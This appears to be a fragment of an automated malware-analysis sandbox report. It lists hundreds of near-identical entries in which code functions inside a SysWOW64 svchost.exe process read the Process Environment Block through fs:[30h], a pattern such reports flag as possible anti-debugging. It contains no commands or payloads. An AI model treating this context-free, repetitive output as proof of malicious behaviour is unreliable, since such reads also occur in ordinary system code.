                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C310 mov ecx, dword ptr fs:[00000030h]2_2_0392C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]2_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov ecx, dword ptr fs:[00000030h]2_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]2_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]2_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950310 mov ecx, dword ptr fs:[00000030h]2_2_03950310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov ecx, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA352 mov eax, dword ptr fs:[00000030h]2_2_039FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D8350 mov ecx, dword ptr fs:[00000030h]2_2_039D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D437C mov eax, dword ptr fs:[00000030h]2_2_039D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0634F mov eax, dword ptr fs:[00000030h]2_2_03A0634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]2_2_0396E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]2_2_0396E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h]2_2_039402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h]2_2_039402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov ecx, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A062D6 mov eax, dword ptr fs:[00000030h]2_2_03A062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392823B mov eax, dword ptr fs:[00000030h]2_2_0392823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A250 mov eax, dword ptr fs:[00000030h]2_2_0392A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936259 mov eax, dword ptr fs:[00000030h]2_2_03936259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h]2_2_039EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h]2_2_039EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B8243 mov eax, dword ptr fs:[00000030h]2_2_039B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B8243 mov ecx, dword ptr fs:[00000030h]2_2_039B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392826B mov eax, dword ptr fs:[00000030h]2_2_0392826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0625D mov eax, dword ptr fs:[00000030h]2_2_03A0625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03970185 mov eax, dword ptr fs:[00000030h]2_2_03970185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]2_2_039EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]2_2_039EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]2_2_039D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]2_2_039D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A061E5 mov eax, dword ptr fs:[00000030h]2_2_03A061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]2_2_039F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]2_2_039F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039601F8 mov eax, dword ptr fs:[00000030h]2_2_039601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov ecx, dword ptr fs:[00000030h]2_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F0115 mov eax, dword ptr fs:[00000030h]2_2_039F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960124 mov eax, dword ptr fs:[00000030h]2_2_03960124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C156 mov eax, dword ptr fs:[00000030h]2_2_0392C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C8158 mov eax, dword ptr fs:[00000030h]2_2_039C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h]2_2_03A04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h]2_2_03A04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]2_2_03936154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]2_2_03936154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov ecx, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393208A mov eax, dword ptr fs:[00000030h]2_2_0393208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F60B8 mov eax, dword ptr fs:[00000030h]2_2_039F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F60B8 mov ecx, dword ptr fs:[00000030h]2_2_039F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039280A0 mov eax, dword ptr fs:[00000030h]2_2_039280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C80A8 mov eax, dword ptr fs:[00000030h]2_2_039C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B20DE mov eax, dword ptr fs:[00000030h]2_2_039B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C0F0 mov eax, dword ptr fs:[00000030h]2_2_0392C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039720F0 mov ecx, dword ptr fs:[00000030h]2_2_039720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0392A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039380E9 mov eax, dword ptr fs:[00000030h]2_2_039380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B60E0 mov eax, dword ptr fs:[00000030h]2_2_039B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4000 mov ecx, dword ptr fs:[00000030h]2_2_039B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6030 mov eax, dword ptr fs:[00000030h]2_2_039C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A020 mov eax, dword ptr fs:[00000030h]2_2_0392A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C020 mov eax, dword ptr fs:[00000030h]2_2_0392C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932050 mov eax, dword ptr fs:[00000030h]2_2_03932050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6050 mov eax, dword ptr fs:[00000030h]2_2_039B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395C073 mov eax, dword ptr fs:[00000030h]2_2_0395C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D678E mov eax, dword ptr fs:[00000030h]2_2_039D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039307AF mov eax, dword ptr fs:[00000030h]2_2_039307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E47A0 mov eax, dword ptr fs:[00000030h]2_2_039E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393C7C0 mov eax, dword ptr fs:[00000030h]2_2_0393C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B07C3 mov eax, dword ptr fs:[00000030h]2_2_039B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]2_2_039347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]2_2_039347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE7E1 mov eax, dword ptr fs:[00000030h]2_2_039BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930710 mov eax, dword ptr fs:[00000030h]2_2_03930710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960710 mov eax, dword ptr fs:[00000030h]2_2_03960710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C700 mov eax, dword ptr fs:[00000030h]2_2_0396C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov ecx, dword ptr fs:[00000030h]2_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AC730 mov eax, dword ptr fs:[00000030h]2_2_039AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]2_2_0396C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]2_2_0396C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930750 mov eax, dword ptr fs:[00000030h]2_2_03930750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE75D mov eax, dword ptr fs:[00000030h]2_2_039BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]2_2_03972750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]2_2_03972750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4755 mov eax, dword ptr fs:[00000030h]2_2_039B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov esi, dword ptr fs:[00000030h]2_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]2_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]2_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938770 mov eax, dword ptr fs:[00000030h]2_2_03938770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039666B0 mov eax, dword ptr fs:[00000030h]2_2_039666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C6A6 mov eax, dword ptr fs:[00000030h]2_2_0396C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0396A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov eax, dword ptr fs:[00000030h]2_2_0396A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972619 mov eax, dword ptr fs:[00000030h]2_2_03972619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE609 mov eax, dword ptr fs:[00000030h]2_2_039AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E627 mov eax, dword ptr fs:[00000030h]2_2_0394E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03966620 mov eax, dword ptr fs:[00000030h]2_2_03966620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968620 mov eax, dword ptr fs:[00000030h]2_2_03968620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393262C mov eax, dword ptr fs:[00000030h]2_2_0393262C
